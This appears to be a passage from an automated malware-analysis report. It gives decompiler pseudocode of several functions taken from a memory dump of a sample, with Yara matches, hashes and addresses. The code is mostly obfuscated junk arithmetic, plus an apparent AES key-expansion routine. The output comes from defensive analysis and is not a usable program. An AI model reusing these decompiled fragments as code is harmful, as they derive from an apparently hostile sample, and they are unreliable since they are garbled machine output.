					__cl = __cl ^  *0xe385e2a0;
					asm("adc [0xc6ce9df9], bh");
					_t9 = __ecx;
					__ecx =  *0x34e898ea;
					 *0x34e898ea = _t9;
					__ebp = __ebp +  *0x87971d9a;
					__esi = __esi +  *0x41dad0c4;
					__edx =  *0x93aedb69 * 0xdd55;
					asm("adc esi, [0x7d24e283]");
					if( *0x93aedb69 * 0xdd55 >= 0) {
						goto L1;
					} else {
						__eax = __eax +  *0x77fd5f71;
						asm("scasb");
						 *0x2c0973a0 =  *0x2c0973a0 - __dh;
						_pop(__ebp);
						__ecx = __ecx + 1;
						__esp = 0x61ce06c7;
						if(__ecx != 0) {
							goto L1;
						} else {
							 *0x76af17b =  *0x76af17b ^ __ebp;
							 *0xcc01801e =  *0xcc01801e >> 0xd6;
							asm("stosd");
							if( *0xcc01801e == 0) {
								goto L1;
							} else {
								 *0xc63781dc = 0x61ce06c7;
								asm("scasb");
								if(__eax <  *0x3b528e74) {
									goto L1;
								} else {
									asm("sbb ebp, [0x50368f78]");
									asm("adc [0x38b50410], bl");
									__ebx = __ebx &  *0xce64b005;
									asm("sbb edi, [0x6f93e396]");
									asm("sbb ebp, 0x4d1b53d9");
									if(( *0x38da5df & __ebx) <= 0) {
										goto L1;
									} else {
										__ebx =  *0xd211d17e * 0x4c6f;
										if(__ebx <= 0) {
											goto L1;
										} else {
											__eax =  *0xa88b607e * 0x646;
											__ch = __ch -  *0x9955d908;
											if(__ch > 0) {
												goto L1;
											} else {
												__edx =  *0x3e09c97f * 0xf244;
												_t12 = __ecx;
												__ecx =  *0x9164f73d;
												 *0x9164f73d = _t12;
												 *0xcd784909 =  *0xcd784909 >> 0xc0;
												__ecx =  *0x9164f73d + 1;
												_t13 = __ebx;
												__ebx =  *0xa65c0b39;
												 *0xa65c0b39 = _t13;
												__esp = 0xffffffffc8a653f8;
												if(0x61ce06c7 < 0) {
													goto L1;
												} else {
													asm("adc edi, [0xdf1fa978]");
													if(0x61ce06c7 >= 0) {
														goto L1;
													} else {
														__edx = __edx -  *0xc8990b71;
														if(( *0xe7f13c05 & __edx) != 0) {
															goto L1;
														} else {
															 *0xdf1fa87b =  *0xdf1fa87b << 0;
															if( *0xdf1fa87b >= 0) {
																goto L1;
															} else {
																 *0x12370e71 = __edx;
																__bh = __bh | 0x00000024;
																__esp =  *0x1779016a * 0xa405;
																asm("sbb [0xbc7ba80f], esi");
																__ecx = 0x667c0e25;
																if(__esp > 0) {
																	goto L1;
																} else {
																	__esi =  *0x99783d7f * 0x1120;
																	__bl = __bl ^ 0x000000e3;
																	__ah = __ah +  *0xa491981a;
																	 *0x3e85d393 =  *0x3e85d393 << 0x5b;
																	__ebp = __ebp ^  *0x643707df;
																	_pop(__esp);
																	 *0xdaed681e =  *0xdaed681e ^ __ebx;
																	 *0x1215d79e =  *0x1215d79e + __eax;
																	asm("sbb [0x8b7bd982], cl");
																	 *0xb71362c9 =  *0xb71362c9 << 0xb9;
																	asm("rol dword [0x90da39f7], 0xe");
																	__ebp = __ebp + 1;
																	__esp = __esp - 1;
																	asm("rcl dword [0xa773ab0d], 0x7a");
																	asm("cmpsb");
																	asm("rol dword [0xc4e034cd], 0x94");
																	__ebx =  *0x45487295;
																	__ebp = __ebp |  *0x9e4d103e;
																	asm("sbb ebx, 0x9b4c3833");
																	__ebx =  *0x45487295 + 1;
																	 *0xc8f0c7df =  *0xc8f0c7df ^ __esp;
																	asm("ror byte [0x9cf939b5], 0x8f");
																	 *0xfacb122d =  *0xfacb122d + 0xb13da0fb;
																	__ebp = __ebp ^ 0x0d5ac239;
																	 *0xc9d9bda0 =  *0xc9d9bda0 + __al;
																	__ebx =  *0x45487295 + 1 - 1;
																	__ecx = 0x66700601;
																	_push(__ebx);
																	_push( *0xd04b15be);
																	__edx =  *0xeb10cc6a * 0x5352;
																	__ebx = __ebx &  *0x4962298f;
																	__ebp = __ebp - 0xe636266;
																	__ecx =  *0xb376cb9b;
																	__eax = __eax ^  *0xe14e5c0e;
																	 *0x9a162426 =  *0x9a162426 - __ebp;
																	__esp = __esp | 0x7c15e3ef;
																	asm("adc [0xa4ed158a], ah");
																	__edx = 0x859c9db;
																	__bh = __bh |  *0xb337586;
																	__ah = __ah + 0x1a;
																	_t16 = __ebx;
																	__ebx =  *0xec75ef8c;
																	 *0xec75ef8c = _t16;
																	_push(0xc573a637);
																	__esi =  *0xdf8727fe;
																	 *0xdf8727fe =  *0x99783d7f * 0x1120;
																	__esi =  *0xdf8727fe | 0x0ba42ecc;
																	__esp = 0xb37df03e;
																	if(( *0xdf8727fe | 0x0ba42ecc) < 0) {
																		goto L1;
																	} else {
																		asm("scasd");
																		 *0x5a7ebb36 =  *0x5a7ebb36 | 0x0859c9db;
																		asm("rol dword [0x378ad38c], 0x8e");
																		_pop(__esi);
																		_push(0xa48c4c91);
																		asm("scasb");
																		 *0x1c6a54c6 =  *0x1c6a54c6 + __ch;
																		asm("adc al, 0xa2");
																		if( *0x1c6a54c6 < 0) {
																			goto L1;
																		} else {
																			__edx = 0x859c9db -  *0x7e61b372;
																			asm("sbb ebx, [0xb0614c07]");
																			__ebx = __ebx & 0x713719ef;
																			asm("rcr byte [0x523ef2f2], 0xc6");
																			 *0x5daa4eec =  *0x5daa4eec >> 0x65;
																			__bh = __bh | 0x00000084;
																			asm("rol dword [0x92379f6d], 0xcc");
																			if(__bh < 0) {
																				goto L1;
																			} else {
																				__ecx = 0x5aee5c72;
																				__ebp = __ebp |  *0xcf588f9c;
																				__esi = __esi & 0x54681fa3;
																				asm("sbb [0x28317bd7], ch");
																				if(__esi < 0) {
																					goto L1;
																				} else {
																					__esi =  *0xf3a0647c * 0xd21d;
																					if(__bh <= 0) {
																						goto L1;
																						do {
																							do {
																								do {
																									do {
																										goto L1;
																									} while ( *0xee4f0add > 0);
																									 *0x648be5b9 =  *0x648be5b9 << 0x8c;
																									 *0x708e6d0a =  *0x708e6d0a - _t32;
																								} while ( *0x708e6d0a >= 0);
																								asm("adc eax, 0x1227a573");
																								asm("cmpsw");
																								_pop(_t33);
																								_t36 = _t36 ^ 0x000000b1;
																								_t26 = _t26 ^  *0x53a5998a;
																								_push( *0xae35f26c);
																							} while (_t26 != 0);
																							asm("sbb ebp, [0xd6c31d7a]");
																							 *0x2b15d799 =  *0x2b15d799 << 0x30;
																							asm("adc esi, [0xaf97c493]");
																							_t34 = _t33 &  *0x9c2a4588;
																							_t36 = 0x3aa6a99e;
																							 *0x941c3909 = 0xe2a8d637;
																						} while (_t34 >= 0);
																						asm("sbb eax, [0x7c260b71]");
																						 *0x63124625 = 0x3aa6a99e;
																						 *0x544bde9b = _t38;
																						_push(_t34);
																						asm("adc [0x45783818], dh");
																						 *0xf4266f07 = _t34;
																						asm("sbb edi, 0x6ecf5f93");
																						return _t22;
																					} else {
																						__ecx = 0xc36662fc;
																						asm("adc dl, 0xc6");
																						__esp = 0xffffffffb37df03f;
																						__ebp = __ebp |  *0x2bc97133;
																						 *0xedbcbe2c =  *0xedbcbe2c << 0x47;
																						_push( *0x6a8436ef);
																						__esp = 0xffffffffd1246c04;
																						__eax = 0x8d4a7ddf;
																						__esi = __esi & 0x93056e09;
																						 *0x9e165e28 = __ah;
																						__ecx = 0xc36662fc &  *0x6b059e0e;
																						 *0x9e09410a =  *0x9e09410a + __dh;
																						__esi =  *0x9e170b6a * 0x5b05;
																						 *0x9e0737eb =  *0x9e0737eb >> 0x6c;
																						__ecx = 0xc36662fc &  *0x6b059e0e ^  *0x2c88a603;
																						asm("ror byte [0xc008a604], 0x4a");
																						 *0x7dae04bf =  *0x7dae04bf << 0x97;
																						return 0x8d4a7ddf;
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}














            0x0041d300
            0x0041d300
            0x0041d305
            0x0041d176
            0x0041d176
            0x0041d17c
            0x0041d185
            0x0041d18b
            0x0041d191
            0x0041d19d
            0x0041d1a3
            0x0041d1a9
            0x0041d1af
            0x0041d1b6
            0x0041d1be
            0x0041d1c4
            0x0041d1ca
            0x0041d1d6
            0x0041d1d8
            0x0041d1d9
            0x0041d1e4
            0x0041d1ea
            0x0041d1ed
            0x0041d1f3
            0x0041d1ff
            0x0041d20c
            0x0041d212
            0x0041d218
            0x0041d224
            0x0041d227
            0x0041d22d
            0x0041d234
            0x0041d241
            0x0041d247
            0x0041d24a
            0x0041d24d
            0x0041d253
            0x0041d254
            0x0041d25b
            0x0041d30b
            0x0041d30b
            0x0041d311
            0x0041d312
            0x0041d318
            0x0041d31e
            0x0041d31e
            0x0041d31e
            0x0041d324
            0x0041d32a
            0x0041d330
            0x0041d33a
            0x0041d340
            0x00000000
            0x0041d346
            0x0041d346
            0x0041d34c
            0x0041d34d
            0x0041d353
            0x0041d354
            0x0041d355
            0x0041d35b
            0x00000000
            0x0041d361
            0x0041d361
            0x0041d367
            0x0041d36e
            0x0041d36f
            0x00000000
            0x0041d375
            0x0041d37b
            0x0041d381
            0x0041d382
            0x00000000
            0x0041d388
            0x0041d388
            0x0041d38e
            0x0041d394
            0x0041d39a
            0x0041d3a6
            0x0041d3ac
            0x00000000
            0x0041d3b2
            0x0041d3b2
            0x0041d3bc
            0x00000000
            0x0041d3c2
            0x0041d3c2
            0x0041d3cc
            0x0041d3d2
            0x00000000
            0x0041d3d8
            0x0041d3d8
            0x0041d3e2
            0x0041d3e2
            0x0041d3e2
            0x0041d3e8
            0x0041d3ef
            0x0041d3f6
            0x0041d3f6
            0x0041d3f6
            0x0041d3fc
            0x0041d402
            0x00000000
            0x0041d408
            0x0041d408
            0x0041d40e
            0x00000000
            0x0041d414
            0x0041d414
            0x0041d420
            0x00000000
            0x0041d426
            0x0041d426
            0x0041d42d
            0x00000000
            0x0041d433
            0x0041d433
            0x0041d439
            0x0041d43c
            0x0041d446
            0x0041d44c
            0x0041d451
            0x00000000
            0x0041d457
            0x0041d457
            0x0041d461
            0x0041d464
            0x0041d470
            0x0041d477
            0x0041d47d
            0x0041d47e
            0x0041d484
            0x0041d48a
            0x0041d490
            0x0041d497
            0x0041d49e
            0x0041d49f
            0x0041d4a6
            0x0041d4ad
            0x0041d4ae
            0x0041d4b5
            0x0041d4bb
            0x0041d4c1
            0x0041d4c7
            0x0041d4c8
            0x0041d4ce
            0x0041d4d5
            0x0041d4db
            0x0041d4e1
            0x0041d4e7
            0x0041d4e8
            0x0041d4ee
            0x0041d4ef
            0x0041d4f5
            0x0041d4ff
            0x0041d505
            0x0041d50b
            0x0041d511
            0x0041d517
            0x0041d51d
            0x0041d523
            0x0041d529
            0x0041d52f
            0x0041d535
            0x0041d538
            0x0041d538
            0x0041d538
            0x0041d544
            0x0041d54f
            0x0041d54f
            0x0041d555
            0x0041d55b
            0x0041d561
            0x00000000
            0x0041d567
            0x0041d571
            0x0041d572
            0x0041d57d
            0x0041d584
            0x0041d585
            0x0041d58a
            0x0041d58b
            0x0041d591
            0x0041d593
            0x00000000
            0x0041d599
            0x0041d599
            0x0041d5a5
            0x0041d5ab
            0x0041d5b1
            0x0041d5b8
            0x0041d5bf
            0x0041d5c2
            0x0041d5c9
            0x00000000
            0x0041d5cf
            0x0041d5cf
            0x0041d5d5
            0x0041d5dc
            0x0041d5e2
            0x0041d5e8
            0x00000000
            0x0041d5ee
            0x0041d5ee
            0x0041d5fb
            0x00000000
            0x0041d176
            0x0041d176
            0x0041d176
            0x0041d176
            0x00000000
            0x00000000
            0x0041d26d
            0x0041d274
            0x0041d274
            0x0041d280
            0x0041d285
            0x0041d287
            0x0041d288
            0x0041d28b
            0x0041d291
            0x0041d291
            0x0041d29d
            0x0041d2a3
            0x0041d2aa
            0x0041d2b0
            0x0041d2b6
            0x0041d2bc
            0x0041d2bc
            0x0041d2c7
            0x0041d2cd
            0x0041d2d9
            0x0041d2e5
            0x0041d2e6
            0x0041d2ec
            0x0041d2f8
            0x0041d2fe
            0x0041d601
            0x0041d601
            0x0041d607
            0x0041d60a
            0x0041d60b
            0x0041d611
            0x0041d618
            0x0041d61e
            0x0041d624
            0x0041d62a
            0x0041d630
            0x0041d63c
            0x0041d642
            0x0041d654
            0x0041d65e
            0x0041d665
            0x0041d66b
            0x0041d672
            0x0041d679
            0x0041d679
            0x0041d5fb
            0x0041d5e8
            0x0041d5c9
            0x0041d593
            0x0041d561
            0x0041d451
            0x0041d42d
            0x0041d420
            0x0041d40e
            0x0041d402
            0x0041d3d2
            0x0041d3bc
            0x0041d3ac
            0x0041d382
            0x0041d36f
            0x0041d35b
            0x0041d340

            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ba5eac1c83eaec50bd19c45222c553214470a2a6f1ef31e84376d7f28b178a86
            • Instruction ID: f795008f5663590a00bb52eb0ea429ae0de5303dd029c076d807dffb583b36ff
            • Opcode Fuzzy Hash: ba5eac1c83eaec50bd19c45222c553214470a2a6f1ef31e84376d7f28b178a86
            • Instruction Fuzzy Hash: ADC152B3904341EFDB16DF39D88AB813FB2F752324B04865EC0A1675A5D778216ACF89
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0041E1F9, Relevance: .2, Instructions: 176COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 28%
            			E0041E1F9(signed char __eax, intOrPtr __ebx, signed char __ecx, signed int __edx, signed int __edi, signed int __esi, void* _a340257777) {
				char _v3;
				void* _v5;
				signed char _t35;
				void* _t36;
				void* _t37;
				signed char _t41;
				signed char _t49;
				signed int _t64;
				signed int _t69;
				signed int _t84;

				_t69 = __esi;
				_t64 = __edi;
				_t57 = __edx;
				_t48 = __ecx;
				_t43 = __ebx;
				_t35 = __eax;
				goto L1;
				do {
					do {
						do {
							do {
								do {
									L1:
									asm("rcl dword [0xb0939ff7], 0xd1");
									 *0x748f83e7 =  *0x748f83e7 ^ _t35;
									_t57 = (_t57 | 0x000000b7) ^  *0xe217dc62;
									asm("sbb [0xc4bbc419], edi");
									_t1 = _t35;
									_t35 =  *0x759084e5;
									 *0x759084e5 = _t1;
									_t69 = _t69 - 1;
									asm("sbb [0x218dd63], al");
									asm("scasb");
								} while ((_t48 & 0x000000b0) >= 0);
								 *0xe77cd173 =  *0xe77cd173 - _t69;
								asm("lodsb");
								asm("sbb ebx, 0xef4544a1");
								_t64 = _t64 ^ 0x2f9d1616;
								asm("adc bh, 0x1c");
								asm("sbb edi, 0x32c1ddbd");
								_t4 = _t43;
								_t43 =  *0xefa8e0cc;
								 *0xefa8e0cc = _t4;
								asm("adc edi, [0x85c02c16]");
								asm("rol dword [0xb2efca25], 0xef");
								_t48 = _t48 - 0x32;
								_pop( *0xefa8e0cc);
								_t57 = _t57 |  *0xa8e0cc32;
								 *0xc83916ef = _t43;
							} while (_t57 != 0);
							asm("rol byte [0xd8a8c4a8], 0xfc");
							 *0xc68ff209 =  *0x997775;
							 *0xe0cc32c1 =  *0xe0cc32c1 | _t69;
							 *0x3816efa8 =  *0x3816efa8 << 0x25;
							asm("rcr dword [0x173a7bc8], 0xd8");
							_push(_t57);
							_t36 = _t35 + 1;
							_t84 = 0x45c6a616 -  *0xef45d88d;
							 *0x81c42916 = _t69;
							 *0x50405217 = _t36;
							_t49 = _t48 +  *0xef45d88d;
							_t37 = _t36;
							 *0xaddd0fb4 =  *0xaddd0fb4 + _t57;
							_t64 = _t64 &  *0xef45d88d;
							 *0x87dbae16 =  *0x87dbae16 & _t57;
							asm("adc [0xe7553110], dl");
							asm("rol dword [0x453d99a1], 0x8c");
							_t43 = 0x1db40ffd;
							 *0x2b16efa8 =  *0x2b16efa8 | _t49;
							 *0xcc32c1ef =  *0xcc32c1ef ^ ( &_v3 +  *0x8b7a16ef |  *0x9cba1d16);
							 *0x16efa8e0 =  *0x16efa8e0 | _t49;
							_t35 = _t37 -  *0x17ff2f8a;
							asm("rcr dword [0xefa8e0cc], 0xe3");
							asm("sbb ecx, 0x7093ff16");
							 *0xc5f7c62b =  *0xc5f7c62b - 0x45c6a616;
							 *0xa8e0cc32 =  *0xa8e0cc32 + _t35;
							asm("sbb ebx, [0x34f216ef]");
							 *0x1ee67b3 =  *0x1ee67b3 - 0x1db40ffd;
							_t69 =  *0x81c42916 & 0x395fc0d6;
							_t48 = 0xa7;
							 *0xa2f716d2 =  *0xa2f716d2 << 0x36;
						} while ( *0xa2f716d2 <= 0);
						 *0xe2aa9076 =  *0xe2aa9076 >> 0x82;
						 *0x36b616d2 =  *0x36b616d2 + _t35;
						asm("adc ah, [0xa816efa8]");
						asm("sbb ch, 0xe2");
						asm("scasb");
						 *0xa8e0cc32 =  *0xa8e0cc32 >> 0x2b;
						asm("ror dword [0xd79c0126], 0x27");
						asm("rcl byte [0xba16efa8], 0xa6");
						 *0xf9af869a =  *0xf9af869a >> 0xb4;
						_t57 = 0x395fc3cc;
						 *0x420816d2 =  *0x420816d2 & 0x395fc3cc;
						asm("sbb edx, [0xf2c1ab9c]");
						 *0xe0cc32ba =  *0xe0cc32ba >> 0xac;
						asm("adc [0x416efa8], dh");
						asm("adc esp, [0x16d24939]");
						 *0x71c621c =  *0x71c621c - 0xffffffffffffffb3;
						asm("movsb");
						_t64 = 0xe0cc32c1 &  *0xcc32c1db;
						_t48 = 0xe0;
						asm("adc [0xfe16efa8], ch");
						_t43 = 0x1db40f5f;
					} while (0x1db40f5f >= 0);
					 *0xd1b49ba0 = 0x395fc3cc;
					asm("adc ebx, [0x395fa899]");
					asm("sbb ah, 0xd2");
					asm("adc edx, [0xc1dec32e]");
					asm("rcl dword [0x470c16ef], 0x9b");
					asm("sbb bh, 0xa0");
					 *0xccecc9b4 =  *0xccecc9b4 >> 0x4e;
					_t43 = 0x1db40f5f -  *0x49395fc2;
					asm("sbb [0xc48616d2], bl");
					_t69 = (_t69 &  *0xf4be16ef) - 0xe0cc32c1;
					 *0x16efa8 =  *0x16efa8 << 0xd9;
					asm("rol byte [0x704b93b7], 0x4");
					asm("lodsb");
					asm("adc dh, [0x395faf88]");
					_t48 = 0xde;
					_t35 =  *0x241016d2;
					_t57 =  *0xd1b49ba0 -  *0xddbd3ccd &  *0xd88daddd;
					_t31 = _t64 | 0x0fb45494;
					_t64 =  *0xe04c16ef;
					 *0xe04c16ef = _t31;
				} while ( &_v3 > 0);
				asm("sbb eax, [0xa8008977]");
				 *0x9e3f16ef = _t84;
				 *0xf9e2bc0 =  *0xf9e2bc0 >> 0xa5;
				asm("sbb ecx, [0x40ecb2a1]");
				asm("adc edx, [0x826380d6]");
				 *0xd8a8c4a8 =  *0xd8a8c4a8 << 0x7e;
				 *0xf9e2bbc =  *0xf9e2bbc ^ 0x395fc3cc;
				asm("rcr dword [0xe24b16ef], 0x75");
				 *0xf0cc319f =  *0xf0cc319f << 0xf1;
				 *0x941616d2 = _t57;
				asm("sbb ebx, 0xe0cc32c1");
				asm("rcr byte [0xa8c4a800], 0x3a");
				 *0x16ef45d8 =  *0x16ef45d8 ^  *0x9e3f16ef;
				asm("sbb [0x173a78d6], eax");
				_push( *0x941616d2 ^ 0x000000b6);
				_t41 = _t35 +  *0x45d8a8c4 -  *0x8f16ef88 + 1;
				_push(_t41);
				asm("adc edi, [0xef45d88d]");
				return _t41 | 0x00000016;
			}













            0x0041e1f9
            0x0041e1f9
            0x0041e1f9
            0x0041e1f9
            0x0041e1f9
            0x0041e1f9
            0x0041e1fa
            0x0041e1fc
            0x0041e1fc
            0x0041e1fc
            0x0041e1fc
            0x0041e1fc
            0x0041e1fc
            0x0041e1ff
            0x0041e206
            0x0041e20d
            0x0041e213
            0x0041e219
            0x0041e219
            0x0041e219
            0x0041e21f
            0x0041e220
            0x0041e229
            0x0041e229
            0x0041e22c
            0x0041e232
            0x0041e233
            0x0041e239
            0x0041e23f
            0x0041e242
            0x0041e248
            0x0041e248
            0x0041e248
            0x0041e24e
            0x0041e254
            0x0041e25b
            0x0041e25e
            0x0041e270
            0x0041e276
            0x0041e276
            0x0041e288
            0x0041e296
            0x0041e29c
            0x0041e2a2
            0x0041e2a9
            0x0041e2b0
            0x0041e2b1
            0x0041e2c6
            0x0041e2cc
            0x0041e2d5
            0x0041e2db
            0x0041e2e7
            0x0041e2e8
            0x0041e2ee
            0x0041e2f4
            0x0041e2fa
            0x0041e300
            0x0041e30d
            0x0041e318
            0x0041e324
            0x0041e32a
            0x0041e330
            0x0041e33c
            0x0041e343
            0x0041e349
            0x0041e34f
            0x0041e355
            0x0041e36f
            0x0041e375
            0x0041e37b
            0x0041e37c
            0x0041e37c
            0x0041e389
            0x0041e397
            0x0041e3a8
            0x0041e3ae
            0x0041e3b7
            0x0041e3b8
            0x0041e3c5
            0x0041e3d1
            0x0041e3db
            0x0041e3e2
            0x0041e3e8
            0x0041e3ee
            0x0041e3f4
            0x0041e3fb
            0x0041e40c
            0x0041e412
            0x0041e418
            0x0041e419
            0x0041e41f
            0x0041e421
            0x0041e427
            0x0041e427
            0x0041e443
            0x0041e449
            0x0041e450
            0x0041e459
            0x0041e465
            0x0041e46c
            0x0041e46f
            0x0041e476
            0x0041e47c
            0x0041e488
            0x0041e48e
            0x0041e495
            0x0041e49c
            0x0041e49d
            0x0041e4a3
            0x0041e4a4
            0x0041e4b0
            0x0041e4b7
            0x0041e4b7
            0x0041e4b7
            0x0041e4b7
            0x0041e4c4
            0x0041e4d0
            0x0041e4d6
            0x0041e4dd
            0x0041e4e9
            0x0041e4f2
            0x0041e500
            0x0041e50f
            0x0041e516
            0x0041e524
            0x0041e530
            0x0041e542
            0x0041e549
            0x0041e552
            0x0041e558
            0x0041e559
            0x0041e55a
            0x0041e55b
            0x0041e563

            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1f86302cb3ac984c808b469e17c143c688400af69dabe9caa7c9cbc9c00ec6ce
            • Instruction ID: 6902a1d482b9c3ad5b68a038da537a92e34616af25d04aa9eb91ec022aa4e9c3
            • Opcode Fuzzy Hash: 1f86302cb3ac984c808b469e17c143c688400af69dabe9caa7c9cbc9c00ec6ce
            • Instruction Fuzzy Hash: E48104365487C1DFEB05CF38E89A6463FB5F786320B48078EC8A19B5D2C774116ADB85
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00402D90, Relevance: .2, Instructions: 165COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 68%
            			E00402D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
				signed int _t66;
				signed int* _t72;
				signed int* _t84;
				signed int _t97;
				signed int _t99;
				signed int _t109;
				signed int _t111;
				signed int* _t113;
				signed int _t130;
				signed int _t132;
				signed int _t136;
				signed int _t144;
				signed int _t155;
				signed int _t163;
				intOrPtr _t174;

				_t84 = _a12;
				_t113 = _a8;
				asm("ror esi, 0x8");
				asm("rol eax, 0x8");
				 *_t113 =  *_t84 & 0xff00ff00 |  *_t84 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t113[1] = _t84[1] & 0xff00ff00 | _t84[1] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t113[2] = _t84[2] & 0xff00ff00 | _t84[2] & 0x00ff00ff;
				_t163 = _t84[3];
				_t66 =  &(_t113[1]);
				asm("ror edi, 0x8");
				_t144 = _t163 & 0xff00ff00;
				asm("rol esi, 0x8");
				_t113[3] = _t144 | _t163 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t113[4] = _t84[4] & 0xff00ff00 | _t84[4] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t113[5] = _t84[5] & 0xff00ff00 | _t84[5] & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t113[6] = _t84[6] & 0xff00ff00 | _t84[6] & 0x00ff00ff;
				asm("ror esi, 0x8");
				asm("rol ecx, 0x8");
				_t113[7] = _t84[7] & 0xff00ff00 | _t84[7] & 0x00ff00ff;
				if(_a16 != 0x100) {
					L5:
					return _t66 | 0xffffffff;
				} else {
					_t174 = _a4;
					_t72 = 0;
					_a12 = 0;
					while(1) {
						_t155 =  *(_t66 + 0x18);
						_t97 = ( *(_t174 + 4 + (_t155 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t174 +  &(_t72[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t174 + 4 + (_t155 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t174 + 5 + (_t155 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t174 + 4 + (_t155 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
						_t130 =  *_t66 ^ _t97;
						 *(_t66 + 0x1c) = _t97;
						_t99 =  *(_t66 + 4) ^ _t130;
						 *(_t66 + 0x20) = _t130;
						_t132 =  *(_t66 + 8) ^ _t99;
						 *(_t66 + 0x24) = _t99;
						 *(_t66 + 0x28) = _t132;
						if(_t72 == 6) {
							break;
						}
						_t109 = ( *(_t174 + 4 + (_t132 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t174 + 4 + (_t132 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t174 + 4 + (_t132 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t174 + 5 + (_t132 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
						_t136 =  *(_t66 + 0x10) ^ _t109;
						 *(_t66 + 0x2c) = _t109;
						_t111 =  *(_t66 + 0x14) ^ _t136;
						 *(_t66 + 0x34) = _t111;
						_t72 =  &(_a12[0]);
						 *(_t66 + 0x30) = _t136;
						 *(_t66 + 0x38) = _t111 ^ _t155;
						_t66 = _t66 + 0x20;
						_a12 = _t72;
						if(_t72 < 7) {
							continue;
						} else {
							goto L5;
						}
						goto L7;
					}
					return 0xe;
				}
				L7:
			}


















            0x00402d93
            0x00402d98
            0x00402da0
            0x00402da9
            0x00402db3
            0x00402dba
            0x00402dc3
            0x00402dce
            0x00402dd6
            0x00402ddf
            0x00402dea
            0x00402ded
            0x00402df0
            0x00402df5
            0x00402df8
            0x00402dfe
            0x00402e09
            0x00402e11
            0x00402e1a
            0x00402e25
            0x00402e2d
            0x00402e36
            0x00402e41
            0x00402e49
            0x00402e52
            0x00402e5d
            0x00402e65
            0x00402e6e
            0x00402e80
            0x00402e83
            0x00402f9f
            0x00402fa4
            0x00402e89
            0x00402e89
            0x00402e8c
            0x00402e8e
            0x00402e91
            0x00402e91
            0x00402ef6
            0x00402efb
            0x00402efd
            0x00402f03
            0x00402f05
            0x00402f0b
            0x00402f0d
            0x00402f10
            0x00402f16
            0x00000000
            0x00000000
            0x00402f72
            0x00402f78
            0x00402f7a
            0x00402f80
            0x00402f82
            0x00402f87
            0x00402f88
            0x00402f8b
            0x00402f8e
            0x00402f91
            0x00402f97
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00402f97
            0x00402fae
            0x00402fae
            0x00000000

            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
            • Instruction ID: 72940b2de139f4e90958e9e8763c4e4336f87cc22ae5d142da70f60c8c24c1bc
            • Opcode Fuzzy Hash: baad548f5feed02f012b2fc10accbe050e72558d66b692510d210734a80849a9
            • Instruction Fuzzy Hash: AB5173B3E14A214BD3188E09CD40631B792FFD8312B5F81BEDD199B397CE74E9529A90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00402D87, Relevance: .2, Instructions: 164COMMONCrypto
            Download Yara Rule
            C-Code - Quality: 64%
            			E00402D87(signed int __eax, signed int __ecx, signed int __esi, signed int* _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _t74;
				signed int _t87;
				signed int _t100;
				signed int _t102;
				signed int _t112;
				signed int _t114;
				signed int* _t116;
				signed int _t133;
				signed int _t135;
				signed int _t139;
				signed int _t140;
				signed int _t152;
				signed int* _t173;

				_t161 = __esi;
				_t87 = __ecx;
				_t64 = __eax;
				_pop(ss);
				_push(0x13);
				 *__esi =  *__esi & __ecx;
				if( *__esi < 0) {
					asm("cmc");
					_t87 = _a12;
					_t116 = _a8;
					_push(__esi);
					_push(_t140);
					asm("ror esi, 0x8");
					asm("rol eax, 0x8");
					 *_t116 =  *_t87 & 0xff00ff00 |  *_t87 & 0x00ff00ff;
					asm("ror edi, 0x8");
					asm("rol esi, 0x8");
					_t116[1] =  *(_t87 + 4) & 0xff00ff00 |  *(_t87 + 4) & 0x00ff00ff;
					asm("ror edi, 0x8");
					asm("rol esi, 0x8");
					_t116[2] =  *(_t87 + 8) & 0xff00ff00 |  *(_t87 + 8) & 0x00ff00ff;
					_t161 =  *(_t87 + 0xc);
					_t64 =  &(_t116[1]);
					asm("ror edi, 0x8");
					_t140 = _t161 & 0xff00ff00;
				}
				asm("rol esi, 0x8");
				_t116[3] = _t140 | _t161 & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t116[4] =  *(_t87 + 0x10) & 0xff00ff00 |  *(_t87 + 0x10) & 0x00ff00ff;
				asm("ror edi, 0x8");
				asm("rol esi, 0x8");
				_t116[5] =  *(_t87 + 0x14) & 0xff00ff00 |  *(_t87 + 0x14) & 0x00ff00ff;
